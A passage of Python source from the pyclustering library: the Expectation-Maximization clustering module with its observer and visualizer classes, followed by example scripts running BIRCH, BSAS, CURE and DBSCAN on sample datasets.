kmeans_instance = kmeans(self.__sample, initial_centers, ccore = True)
kmeans_instance.process()
means = kmeans_instance.get_centers()
covariances = []
initial_clusters = kmeans_instance.get_clusters()
for initial_cluster in initial_clusters:
if len(initial_cluster) > 1:
cluster_sample = [ self.__sample[index_point] for index_point in initial_cluster ]
covariances.append(numpy.cov(cluster_sample, rowvar=False))
else:
dimension = len(self.__sample[0])
covariances.append(numpy.zeros((dimension, dimension)) + random.random() / 10.0)
return means, covariances
class ema_observer:
"""!
@brief Observer of EM algorithm for collecting algorithm state on each step.
@details It can be used to obtain whole picture about clustering process of EM algorithm. Allocated clusters,
means and covariances are stored in observer on each step. Here an example of usage:
@code
from pyclustering.cluster.ema import ema, ema_observer
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import SIMPLE_SAMPLES
# Read data from text file.
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
# Create EM observer.
observer = ema_observer()
# Create EM algorithm to allocated four clusters and pass observer to it.
ema_instance = ema(sample, 4, observer=observer)
# Run clustering process.
ema_instance.process()
# Print amount of steps that were done by the algorithm.
print("EMA steps:", observer.get_iterations())
# Print evolution of means and covariances.
print("Means evolution:", observer.get_evolution_means())
print("Covariances evolution:", observer.get_evolution_covariances())
# Print evolution of clusters.
print("Clusters evolution:", observer.get_evolution_clusters())
# Print final clusters.
print("Allocated clusters:", observer.get_evolution_clusters()[-1])
@endcode
"""
def __init__(self):
"""!
@brief Initializes EM observer.
"""
self.__means_evolution = []
self.__covariances_evolution = []
self.__clusters_evolution = []
def __len__(self):
"""!
@return (uint) Amount of iterations that were done by the EM algorithm.
"""
return len(self.__means_evolution)
def get_iterations(self):
"""!
@return (uint) Amount of iterations that were done by the EM algorithm.
"""
return len(self.__means_evolution)
def get_evolution_means(self):
"""!
@return (list) Mean of each cluster on each step of clustering.
"""
return self.__means_evolution
def get_evolution_covariances(self):
"""!
@return (list) Covariance matrix (or variance in case of one-dimensional data) of each cluster on each step of clustering.
"""
return self.__covariances_evolution
def get_evolution_clusters(self):
"""!
@return (list) Allocated clusters on each step of clustering.
"""
return self.__clusters_evolution
def notify(self, means, covariances, clusters):
"""!
@brief This method is used by the algorithm to notify observer about changes where the algorithm
should provide new values: means, covariances and allocated clusters.
@param[in] means (list): Mean of each cluster on currect step.
@param[in] covariances (list): Covariances of each cluster on current step.
@param[in] clusters (list): Allocated cluster on current step.
"""
self.__means_evolution.append(means)
self.__covariances_evolution.append(covariances)
self.__clusters_evolution.append(clusters)
class ema_visualizer:
"""!
@brief Visualizer of EM algorithm's results.
@details Provides services for visualization of particular features of the algorithm, for example,
in case of two-dimensional dataset it shows covariance ellipses.
"""
@staticmethod
def show_clusters(clusters, sample, covariances, means, figure=None, display=True):
"""!
@brief Draws clusters and in case of two-dimensional dataset draws their ellipses.
@details Allocated figure by this method should be closed using `close()` method of this visualizer.
@param[in] clusters (list): Clusters that were allocated by the algorithm.
@param[in] sample (list): Dataset that were used for clustering.
@param[in] covariances (list): Covariances of the clusters.
@param[in] means (list): Means of the clusters.
@param[in] figure (figure): If 'None' then new is figure is creater, otherwise specified figure is used
for visualization.
@param[in] display (bool): If 'True' then figure will be shown by the method, otherwise it should be
shown manually using matplotlib function 'plt.show()'.
@return (figure) Figure where clusters were drawn.
"""
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, sample)
if figure is None:
figure = visualizer.show(display=False)
else:
visualizer.show(figure=figure, display=False)
if len(sample[0]) == 2:
ema_visualizer.__draw_ellipses(figure, visualizer, clusters, covariances, means)
if display is True:
plt.show()
return figure
@staticmethod
def close(figure):
"""!
@brief Closes figure object that was used or allocated by the visualizer.
@param[in] figure (figure): Figure object that was used or allocated by the visualizer.
"""
plt.close(figure)
@staticmethod
def animate_cluster_allocation(data, observer, animation_velocity = 75, movie_fps = 1, save_movie = None):
"""!
@brief Animates clustering process that is performed by EM algorithm.
@param[in] data (list): Dataset that is used for clustering.
@param[in] observer (ema_observer): EM observer that was used for collection information about clustering process.
@param[in] animation_velocity (uint): Interval between frames in milliseconds (for run-time animation only).
@param[in] movie_fps (uint): Defines frames per second (for rendering movie only).
@param[in] save_movie (string): If it is specified then animation will be stored to file that is specified in this parameter.
"""
figure = plt.figure()
def init_frame():
return frame_generation(0)
def frame_generation(index_iteration):
figure.clf()
figure.suptitle("EM algorithm (iteration: " + str(index_iteration) +")", fontsize = 18, fontweight = 'bold')
clusters = observer.get_evolution_clusters()[index_iteration]
covariances = observer.get_evolution_covariances()[index_iteration]
means = observer.get_evolution_means()[index_iteration]
ema_visualizer.show_clusters(clusters, data, covariances, means, figure, False)
figure.subplots_adjust(top=0.85)
return [figure.gca()]
iterations = len(observer)
cluster_animation = animation.FuncAnimation(figure, frame_generation, iterations, interval = animation_velocity, init_func = init_frame, repeat_delay = 5000)
if save_movie is not None:
cluster_animation.save(save_movie, writer='ffmpeg', fps=movie_fps, bitrate=1500)
else:
plt.show()
plt.close(figure)
@staticmethod
def __draw_ellipses(figure, visualizer, clusters, covariances, means):
ax = figure.get_axes()[0]
for index in range(len(clusters)):
angle, width, height = calculate_ellipse_description(covariances[index])
color = visualizer.get_cluster_color(index, 0)
ema_visualizer.__draw_ellipse(ax, means[index][0], means[index][1], angle, width, height, color)
@staticmethod
def __draw_ellipse(ax, x, y, angle, width, height, color):
if (width > 0.0) and (height > 0.0):
ax.plot(x, y, color=color, marker='x', markersize=6)
ellipse = patches.Ellipse((x, y), width, height, alpha=0.2, angle=-angle, linewidth=2, fill=True, zorder=2, color=color)
ax.add_patch(ellipse)
class ema:
"""!
@brief Expectation-Maximization clustering algorithm for Gaussian Mixture Model (GMM).
@details The algorithm provides only clustering services (unsupervised learning).
Here an example of data clustering process:
@code
from pyclustering.cluster.ema import ema, ema_visualizer
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import FCPS_SAMPLES
# Read data from text file.
sample = read_sample(FCPS_SAMPLES.SAMPLE_LSUN)
# Create EM algorithm to allocated four clusters.
ema_instance = ema(sample, 3)
# Run clustering process.
ema_instance.process()
# Get clustering results.
clusters = ema_instance.get_clusters()
covariances = ema_instance.get_covariances()
means = ema_instance.get_centers()
# Visualize obtained clustering results.
ema_visualizer.show_clusters(clusters, sample, covariances, means)
@endcode
Here is clustering results of the Expectation-Maximization clustering algorithm where popular sample 'OldFaithful' was used.
Initial random means and covariances were used in the example. The first step is presented on the left side of the figure and
final result (the last step) is on the right side:
@image html ema_old_faithful_clustering.png
@see ema_visualizer
@see ema_observer
"""
def __init__(self, data, amount_clusters, means=None, variances=None, observer=None, tolerance=0.00001, iterations=100):
"""!
@brief Initializes Expectation-Maximization algorithm for cluster analysis.
@param[in] data (list): Dataset that should be analysed and where each point (object) is represented by the list of coordinates.
@param[in] amount_clusters (uint): Amount of clusters that should be allocated.
@param[in] means (list): Initial means of clusters (amount of means should be equal to amount of clusters for allocation).
If this parameter is 'None' then K-Means algorithm with K-Means++ method will be used for initialization by default.
@param[in] variances (list): Initial cluster variances (or covariances in case of multi-dimensional data). Amount of
covariances should be equal to amount of clusters that should be allocated. If this parameter is 'None' then
K-Means algorithm with K-Means++ method will be used for initialization by default.
@param[in] observer (ema_observer): Observer for gathering information about clustering process.
@param[in] tolerance (float): Defines stop condition of the algorithm (when difference between current and
previous log-likelihood estimation is less then 'tolerance' then clustering is over).
@param[in] iterations (uint): Additional stop condition parameter that defines maximum number of steps that can be
performed by the algorithm during clustering process.
"""
self.__data = numpy.array(data)
self.__amount_clusters = amount_clusters
self.__tolerance = tolerance
self.__iterations = iterations
self.__observer = observer
self.__means = means
self.__variances = variances
self.__verify_arguments()
if (means is None) or (variances is None):
self.__means, self.__variances = ema_initializer(data, amount_clusters).initialize(ema_init_type.KMEANS_INITIALIZATION)
if len(self.__means) != amount_clusters:
self.__amount_clusters = len(self.__means)
self.__rc = [ [0.0] * len(self.__data) for _ in range(amount_clusters) ]
self.__pic = [1.0] * amount_clusters
self.__clusters = []
self.__gaussians = [ [] for _ in range(amount_clusters) ]
self.__stop = False
def process(self):
"""!
@brief Run clustering process of the algorithm.
@return (ema) Returns itself (EMA instance).
"""
previous_likelihood = -200000
current_likelihood = -100000
current_iteration = 0
while(self.__stop is False) and (abs(previous_likelihood - current_likelihood) > self.__tolerance) and (current_iteration < self.__iterations):
self.__expectation_step()
self.__maximization_step()
current_iteration += 1
self.__extract_clusters()
self.__notify()
previous_likelihood = current_likelihood
current_likelihood = self.__log_likelihood()
self.__stop = self.__get_stop_condition()
self.__normalize_probabilities()
return self
def get_clusters(self):
"""!
@return (list) Allocated clusters where each cluster is represented by list of indexes of points from dataset,
for example, two cluster may have following representation [[0, 1, 4], [2, 3, 5, 6]].
"""
return self.__clusters
def get_centers(self):
"""!
@return (list) Corresponding centers (means) of clusters.
"""
return self.__means
def get_covariances(self):
"""!
@return (list) Corresponding variances (or covariances in case of multi-dimensional data) of clusters.
"""
return self.__variances
def get_probabilities(self):
"""!
@brief Returns 2-dimensional list with belong probability of each object from data to cluster correspondingly,
where that first index is for cluster and the second is for point.
@code
# Get belong probablities
probabilities = ema_instance.get_probabilities();
# Show porbability of the fifth element in the first and in the second cluster
index_point = 5;
print("Probability in the first cluster:", probabilities[0][index_point]);
print("Probability in the first cluster:", probabilities[1][index_point]);
@endcode
@return (list) 2-dimensional list with belong probability of each object from data to cluster.
"""
return self.__rc
def __erase_empty_clusters(self):
clusters, means, variances, pic, gaussians, rc = [], [], [], [], [], []
for index_cluster in range(len(self.__clusters)):
if len(self.__clusters[index_cluster]) > 0:
clusters.append(self.__clusters[index_cluster])
means.append(self.__means[index_cluster])
variances.append(self.__variances[index_cluster])
pic.append(self.__pic[index_cluster])
gaussians.append(self.__gaussians[index_cluster])
rc.append(self.__rc[index_cluster])
if len(self.__clusters) != len(clusters):
self.__clusters, self.__means, self.__variances, self.__pic = clusters, means, variances, pic
self.__gaussians, self.__rc = gaussians, rc
self.__amount_clusters = len(self.__clusters)
def __notify(self):
if self.__observer is not None:
self.__observer.notify(self.__means, self.__variances, self.__clusters)
def __extract_clusters(self):
self.__clusters = [[] for _ in range(self.__amount_clusters)]
for index_point in range(len(self.__data)):
candidates = []
for index_cluster in range(self.__amount_clusters):
candidates.append((index_cluster, self.__rc[index_cluster][index_point]))
index_winner = max(candidates, key=lambda candidate: candidate[1])[0]
self.__clusters[index_winner].append(index_point)
self.__erase_empty_clusters()
def __log_likelihood(self):
likelihood = 0.0
for index_point in range(len(self.__data)):
particle = 0.0
for index_cluster in range(self.__amount_clusters):
particle += self.__pic[index_cluster] * self.__gaussians[index_cluster][index_point]
if particle > 0.0:
likelihood += numpy.log(particle)
return likelihood
def __probabilities(self, index_cluster, index_point):
divider = 0.0
for i in range(self.__amount_clusters):
divider += self.__pic[i] * self.__gaussians[i][index_point]
if (divider != 0.0) and (divider != float('inf')):
return self.__pic[index_cluster] * self.__gaussians[index_cluster][index_point] / divider
return 1.0
def __expectation_step(self):
self.__gaussians = [ [] for _ in range(self.__amount_clusters) ]
for index in range(self.__amount_clusters):
self.__gaussians[index] = gaussian(self.__data, self.__means[index], self.__variances[index])
self.__rc = [ [0.0] * len(self.__data) for _ in range(self.__amount_clusters) ]
for index_cluster in range(self.__amount_clusters):
for index_point in range(len(self.__data)):
self.__rc[index_cluster][index_point] = self.__probabilities(index_cluster, index_point)
def __maximization_step(self):
self.__pic = []
self.__means = []
self.__variances = []
amount_impossible_clusters = 0
for index_cluster in range(self.__amount_clusters):
mc = numpy.sum(self.__rc[index_cluster])
if mc == 0.0:
amount_impossible_clusters += 1
continue
self.__pic.append( mc / len(self.__data) )
self.__means.append( self.__update_mean(self.__rc[index_cluster], mc) )
self.__variances.append( self.__update_covariance(self.__means[-1], self.__rc[index_cluster], mc) )
self.__amount_clusters -= amount_impossible_clusters
def __get_stop_condition(self):
for covariance in self.__variances:
if numpy.linalg.norm(covariance) == 0.0:
return True
return False
def __update_covariance(self, means, rc, mc):
covariance = 0.0
for index_point in range(len(self.__data)):
deviation = numpy.array([self.__data[index_point] - means])
covariance += rc[index_point] * deviation.T.dot(deviation)
covariance = covariance / mc
return covariance
def __update_mean(self, rc, mc):
mean = 0.0
for index_point in range(len(self.__data)):
mean += rc[index_point] * self.__data[index_point]
mean = mean / mc
return mean
def __normalize_probabilities(self):
for index_point in range(len(self.__data)):
probability = 0.0
for index_cluster in range(len(self.__clusters)):
probability += self.__rc[index_cluster][index_point]
if abs(probability - 1.0) > 0.000001:
self.__normalize_probability(index_point, probability)
def __normalize_probability(self, index_point, probability):
if probability == 0.0:
return
normalization = 1.0 / probability
for index_cluster in range(len(self.__clusters)):
self.__rc[index_cluster][index_point] *= normalization
def __verify_arguments(self):
"""!
@brief Verify input parameters for the algorithm and throw exception in case of incorrectness.
"""
if len(self.__data) == 0:
raise ValueError("Input data is empty (size: '%d')." % len(self.__data))
if self.__amount_clusters < 1:
raise ValueError("Amount of clusters (current value '%d') should be greater or equal to 1." %
self.__amount_clusters)
```
#### File: cluster/examples/birch_examples.py
```python
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.birch import birch
from pyclustering.container.cftree import measurement_type
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import SIMPLE_SAMPLES, FCPS_SAMPLES
def template_clustering(number_clusters, path, branching_factor=50, max_node_entries=100, initial_diameter=0.5, type_measurement=measurement_type.CENTROID_EUCLIDEAN_DISTANCE, entry_size_limit=200, diameter_multiplier=1.5, show_result=True):
print("Sample: ", path)
sample = read_sample(path)
birch_instance = birch(sample, number_clusters, branching_factor, max_node_entries, initial_diameter,
type_measurement, entry_size_limit, diameter_multiplier)
birch_instance.process()
clusters = birch_instance.get_clusters()
if show_result is True:
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, sample)
visualizer.show()
return sample, clusters
def cluster_sample1():
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 5, 5, 0.1, measurement_type.CENTROID_EUCLIDEAN_DISTANCE, 2) # only two entries available
def cluster_sample2():
template_clustering(3, SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
def cluster_sample3():
template_clustering(4, SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
def cluster_sample4():
template_clustering(5, SIMPLE_SAMPLES.SAMPLE_SIMPLE4)
def cluster_sample5():
template_clustering(4, SIMPLE_SAMPLES.SAMPLE_SIMPLE5)
def cluster_sample7():
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_SIMPLE7)
def cluster_sample8():
template_clustering(4, SIMPLE_SAMPLES.SAMPLE_SIMPLE8)
def cluster_elongate():
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_ELONGATE)
def cluster_lsun():
template_clustering(3, FCPS_SAMPLES.SAMPLE_LSUN)
def cluster_lsun_rebuilt():
template_clustering(3, FCPS_SAMPLES.SAMPLE_LSUN, entry_size_limit=20, diameter_multiplier=1.5)
def cluster_target():
template_clustering(6, FCPS_SAMPLES.SAMPLE_TARGET)
def cluster_two_diamonds():
template_clustering(2, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS)
def cluster_wing_nut():
template_clustering(2, FCPS_SAMPLES.SAMPLE_WING_NUT)
def cluster_chainlink():
template_clustering(2, FCPS_SAMPLES.SAMPLE_CHAINLINK)
def cluster_hepta():
template_clustering(7, FCPS_SAMPLES.SAMPLE_HEPTA)
def cluster_tetra():
template_clustering(4, FCPS_SAMPLES.SAMPLE_TETRA)
def cluster_engy_time():
template_clustering(2, FCPS_SAMPLES.SAMPLE_ENGY_TIME)
def experiment_execution_time(ccore=False):
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
template_clustering(3, SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
template_clustering(4, SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
template_clustering(5, SIMPLE_SAMPLES.SAMPLE_SIMPLE4)
template_clustering(4, SIMPLE_SAMPLES.SAMPLE_SIMPLE5)
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_ELONGATE)
template_clustering(3, FCPS_SAMPLES.SAMPLE_LSUN)
template_clustering(6, FCPS_SAMPLES.SAMPLE_TARGET)
template_clustering(2, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS)
template_clustering(2, FCPS_SAMPLES.SAMPLE_WING_NUT)
template_clustering(2, FCPS_SAMPLES.SAMPLE_CHAINLINK)
template_clustering(7, FCPS_SAMPLES.SAMPLE_HEPTA)
template_clustering(4, FCPS_SAMPLES.SAMPLE_TETRA)
template_clustering(2, FCPS_SAMPLES.SAMPLE_ATOM)
def display_fcps_clustering_results():
(lsun, lsun_clusters) = template_clustering(3, FCPS_SAMPLES.SAMPLE_LSUN, show_result=False)
(target, target_clusters) = template_clustering(6, FCPS_SAMPLES.SAMPLE_TARGET, show_result=False)
(two_diamonds, two_diamonds_clusters) = template_clustering(2, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, show_result=False)
(wing_nut, wing_nut_clusters) = template_clustering(2, FCPS_SAMPLES.SAMPLE_WING_NUT, show_result=False)
(chainlink, chainlink_clusters) = template_clustering(2, FCPS_SAMPLES.SAMPLE_CHAINLINK, show_result=False)
(hepta, hepta_clusters) = template_clustering(7, FCPS_SAMPLES.SAMPLE_HEPTA, show_result=False)
(tetra, tetra_clusters) = template_clustering(4, FCPS_SAMPLES.SAMPLE_TETRA, show_result=False)
(atom, atom_clusters) = template_clustering(2, FCPS_SAMPLES.SAMPLE_ATOM, show_result=False)
visualizer = cluster_visualizer(8, 4)
visualizer.append_clusters(lsun_clusters, lsun, 0)
visualizer.append_clusters(target_clusters, target, 1)
visualizer.append_clusters(two_diamonds_clusters, two_diamonds, 2)
visualizer.append_clusters(wing_nut_clusters, wing_nut, 3)
visualizer.append_clusters(chainlink_clusters, chainlink, 4)
visualizer.append_clusters(hepta_clusters, hepta, 5)
visualizer.append_clusters(tetra_clusters, tetra, 6)
visualizer.append_clusters(atom_clusters, atom, 7)
visualizer.show()
cluster_sample1()
cluster_sample2()
cluster_sample3()
cluster_sample4()
cluster_sample5()
cluster_sample7()
cluster_sample8()
cluster_elongate()
cluster_lsun()
cluster_lsun_rebuilt()
cluster_target()
cluster_two_diamonds()
cluster_wing_nut()
cluster_chainlink()
cluster_hepta()
cluster_tetra()
cluster_engy_time()
experiment_execution_time(True) # C++ code + Python env.
display_fcps_clustering_results()
```
#### File: cluster/examples/bsas_examples.py
```python
from pyclustering.cluster import cluster_visualizer;
from pyclustering.cluster.bsas import bsas, bsas_visualizer;
from pyclustering.samples.definitions import SIMPLE_SAMPLES;
from pyclustering.utils import read_sample;
from pyclustering.utils.metric import distance_metric, type_metric;
def template_clustering(path, amount, threshold, **kwargs):
metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE));
ccore = kwargs.get('ccore', False);
draw = kwargs.get('draw', True);
sample = read_sample(path);
print("Sample: ", path);
bsas_instance = bsas(sample, amount, threshold, ccore=ccore, metric=metric);
bsas_instance.process();
clusters = bsas_instance.get_clusters();
representatives = bsas_instance.get_representatives();
if draw is True:
bsas_visualizer.show_clusters(sample, clusters, representatives);
def cluster_sample1():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0);
def cluster_sample2():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, 1.0);
def cluster_sample3():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4, 1.0);
def cluster_sample4():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 5, 1.0);
def cluster_sample5():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 4, 1.0);
def cluster_sample6():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, 2, 1.0);
def cluster_elongate():
template_clustering(SIMPLE_SAMPLES.SAMPLE_ELONGATE, 2, 1.0);
cluster_sample1();
cluster_sample2();
cluster_sample3();
cluster_sample4();
cluster_sample5();
cluster_sample6();
cluster_elongate();
```
#### File: cluster/examples/cure_examples.py
```python
from pyclustering.utils import read_sample
from pyclustering.utils import timedcall
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.samples.definitions import FCPS_SAMPLES
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.cure import cure
def template_clustering(number_clusters, path, number_represent_points=5, compression=0.5, draw=True, ccore_flag=True):
sample = read_sample(path)
cure_instance = cure(sample, number_clusters, number_represent_points, compression, ccore_flag)
(ticks, _) = timedcall(cure_instance.process)
clusters = cure_instance.get_clusters()
representors = cure_instance.get_representors()
means = cure_instance.get_means()
print("Sample: ", path, "\t\tExecution time: ", ticks, "\n")
#print([len(cluster) for cluster in clusters])
if draw is True:
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, sample)
for cluster_index in range(len(clusters)):
visualizer.append_cluster_attribute(0, cluster_index, representors[cluster_index], '*', 10)
visualizer.append_cluster_attribute(0, cluster_index, [ means[cluster_index] ], 'o')
visualizer.show()
def cluster_sample1():
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
def cluster_sample2():
template_clustering(3, SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
def cluster_sample3():
template_clustering(4, SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
def cluster_sample4():
template_clustering(5, SIMPLE_SAMPLES.SAMPLE_SIMPLE4)
def cluster_sample5():
template_clustering(4, SIMPLE_SAMPLES.SAMPLE_SIMPLE5)
def cluster_sample6():
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_SIMPLE6)
def cluster_elongate():
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_ELONGATE)
def cluster_lsun():
template_clustering(3, FCPS_SAMPLES.SAMPLE_LSUN, 5, 0.3)
def cluster_target():
template_clustering(6, FCPS_SAMPLES.SAMPLE_TARGET, 10, 0.3)
def cluster_two_diamonds():
template_clustering(2, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, 5, 0.3)
def cluster_wing_nut(ccore_flag=True):
template_clustering(2, FCPS_SAMPLES.SAMPLE_WING_NUT, 4, 0.3, ccore_flag=ccore_flag)
def cluster_chainlink():
template_clustering(2, FCPS_SAMPLES.SAMPLE_CHAINLINK, 30, 0.2)
def cluster_hepta():
template_clustering(7, FCPS_SAMPLES.SAMPLE_HEPTA)
def cluster_tetra():
template_clustering(4, FCPS_SAMPLES.SAMPLE_TETRA)
def cluster_engy_time():
template_clustering(2, FCPS_SAMPLES.SAMPLE_ENGY_TIME, 50, 0.5)
def cluster_golf_ball():
template_clustering(1, FCPS_SAMPLES.SAMPLE_GOLF_BALL)
def cluster_atom():
"Impossible to obtain parameters that satisfy us, it seems to me that compression = 0.2 is key parameter here, because results of clustering doesn't depend on number of represented points, except 0."
"Thus the best parameters is following: number of points for representation: [5, 400]; compression: [0.2, 0.204]"
"Results of clustering is not so dramatically, but clusters are not allocated properly"
template_clustering(2, FCPS_SAMPLES.SAMPLE_ATOM, 20, 0.2)
def experiment_execution_time(draw, ccore):
template_clustering(3, FCPS_SAMPLES.SAMPLE_LSUN, 5, 0.3, draw, ccore)
template_clustering(6, FCPS_SAMPLES.SAMPLE_TARGET, 10, 0.3, draw, ccore)
template_clustering(2, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, 5, 0.3, draw, ccore)
template_clustering(2, FCPS_SAMPLES.SAMPLE_WING_NUT, 1, 1, draw, ccore)
template_clustering(2, FCPS_SAMPLES.SAMPLE_CHAINLINK, 5, 0.5, draw, ccore)
template_clustering(4, FCPS_SAMPLES.SAMPLE_TETRA, 5, 0.5, draw, ccore)
template_clustering(7, FCPS_SAMPLES.SAMPLE_HEPTA, 5, 0.5, draw, ccore)
template_clustering(2, FCPS_SAMPLES.SAMPLE_ATOM, 20, 0.2)
cluster_sample1()
cluster_sample2()
cluster_sample3()
cluster_sample4()
cluster_sample5()
cluster_sample6()
cluster_elongate()
cluster_lsun()
cluster_target()
cluster_two_diamonds()
cluster_wing_nut()
cluster_chainlink()
cluster_hepta()
cluster_tetra()
cluster_atom()
cluster_engy_time()
cluster_golf_ball()
experiment_execution_time(True, False)
experiment_execution_time(True, True)
```
#### File: cluster/examples/dbscan_examples.py
```python
import random
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.dbscan import dbscan
from pyclustering.utils import read_sample
from pyclustering.utils import timedcall
from pyclustering.samples.definitions import SIMPLE_SAMPLES, FCPS_SAMPLES
def template_clustering(radius, neighb, path, invisible_axes = False, ccore = True, show = True):
sample = read_sample(path)
dbscan_instance = dbscan(sample, radius, neighb, ccore)
(ticks, _) = timedcall(dbscan_instance.process)
clusters = dbscan_instance.get_clusters()
noise = dbscan_instance.get_noise()
print([len(cluster) for cluster in clusters])
if show:
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, sample)
visualizer.append_cluster(noise, sample, marker = 'x')
visualizer.show()
print("Sample: ", path, "\t\tExecution time: ", ticks, "\n")
return sample, clusters, noise
def cluster_sample1():
template_clustering(0.4, 2, SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
def cluster_sample2():
template_clustering(1, 2, SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
def cluster_sample3():
template_clustering(0.7, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
def cluster_sample4():
template_clustering(0.7, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE4)
def cluster_sample5():
template_clustering(0.7, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE5)
def cluster_sample7():
template_clustering(1.0, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE7)
def cluster_sample8():
template_clustering(1.0, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE8)
def cluster_elongate():
template_clustering(0.5, 3, SIMPLE_SAMPLES.SAMPLE_ELONGATE)
def cluster_lsun():
template_clustering(0.5, 3, FCPS_SAMPLES.SAMPLE_LSUN)
def cluster_target():
template_clustering(0.5, 2, FCPS_SAMPLES.SAMPLE_TARGET)
def cluster_two_diamonds():
"It's hard to choose properly parameters, but it's OK"
template_clustering(0.15, 7, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS)
def cluster_wing_nut():
"It's hard to choose properly parameters, but it's OK"
template_clustering(0.25, 2, FCPS_SAMPLES.SAMPLE_WING_NUT)
def cluster_chainlink():
template_clustering(0.5, 3, FCPS_SAMPLES.SAMPLE_CHAINLINK)
def cluster_hepta():
template_clustering(1, 3, FCPS_SAMPLES.SAMPLE_HEPTA)
def cluster_golf_ball():
"Toooooooooooo looooong"
template_clustering(0.5, 3, FCPS_SAMPLES.SAMPLE_GOLF_BALL)
def cluster_atom():
template_clustering(15, 3, FCPS_SAMPLES.SAMPLE_ATOM)
def cluster_tetra():
template_clustering(0.4, 3, FCPS_SAMPLES.SAMPLE_TETRA)
def cluster_engy_time():
template_clustering(0.2, 20, FCPS_SAMPLES.SAMPLE_ENGY_TIME)
def experiment_execution_time(ccore = False):
"Performance measurement"
template_clustering(0.5, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE1, False, ccore)
template_clustering(1, 2, SIMPLE_SAMPLES.SAMPLE_SIMPLE2, False, ccore)
template_clustering(0.7, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE3, False, ccore)
template_clustering(0.7, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE4, False, ccore)
template_clustering(0.7, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE5, False, ccore)
template_clustering(0.5, 3, SIMPLE_SAMPLES.SAMPLE_ELONGATE, False, ccore)
template_clustering(0.5, 3, FCPS_SAMPLES.SAMPLE_LSUN, False, ccore)
template_clustering(0.5, 2, FCPS_SAMPLES.SAMPLE_TARGET, False, ccore)
template_clustering(0.15, 7, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, ccore)
template_clustering(0.25, 2, FCPS_SAMPLES.SAMPLE_WING_NUT, False, ccore)
template_clustering(0.5, 3, FCPS_SAMPLES.SAMPLE_CHAINLINK, False, ccore)
template_clustering(1, 3, FCPS_SAMPLES.SAMPLE_HEPTA, False, ccore)
template_clustering(0.4, 3, FCPS_SAMPLES.SAMPLE_TETRA, False, ccore)
template_clustering(15, 3, FCPS_SAMPLES.SAMPLE_ATOM, False, ccore)
def display_fcps_clustering_results():
(lsun, lsun_clusters, _) = template_clustering(0.5, 3, FCPS_SAMPLES.SAMPLE_LSUN, False, True, False)
(target, target_clusters, _) = template_clustering(0.5, 2, FCPS_SAMPLES.SAMPLE_TARGET, False, True, False)
(two_diamonds, two_diamonds_clusters, _) = template_clustering(0.15, 7, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
(wing_nut, wing_nut_clusters, _) = template_clustering(0.25, 2, FCPS_SAMPLES.SAMPLE_WING_NUT, False, True, False)
(chainlink, chainlink_clusters, _) = template_clustering(0.5, 3, FCPS_SAMPLES.SAMPLE_CHAINLINK, False, True, False)
(hepta, hepta_clusters, _) = template_clustering(1, 3, FCPS_SAMPLES.SAMPLE_HEPTA, False, True, False)
(tetra, tetra_clusters, _) = template_clustering(0.4, 3, FCPS_SAMPLES.SAMPLE_TETRA, False, True, False)
(atom, atom_clusters, _) = template_clustering(15, 3, FCPS_SAMPLES.SAMPLE_ATOM, False, True, False)
visualizer = cluster_visualizer(8, 4)
visualizer.append_clusters(lsun_clusters, lsun, 0)
visualizer.append_clusters(target_clusters, target, 1)
visualizer.append_clusters(two_diamonds_clusters, two_diamonds, 2)
visualizer.append_clusters(wing_nut_clusters, wing_nut, 3)
visualizer.append_clusters(chainlink_clusters, chainlink, 4)
visualizer.append_clusters(hepta_clusters, hepta, 5)
visualizer.append_clusters(tetra_clusters, tetra, 6)
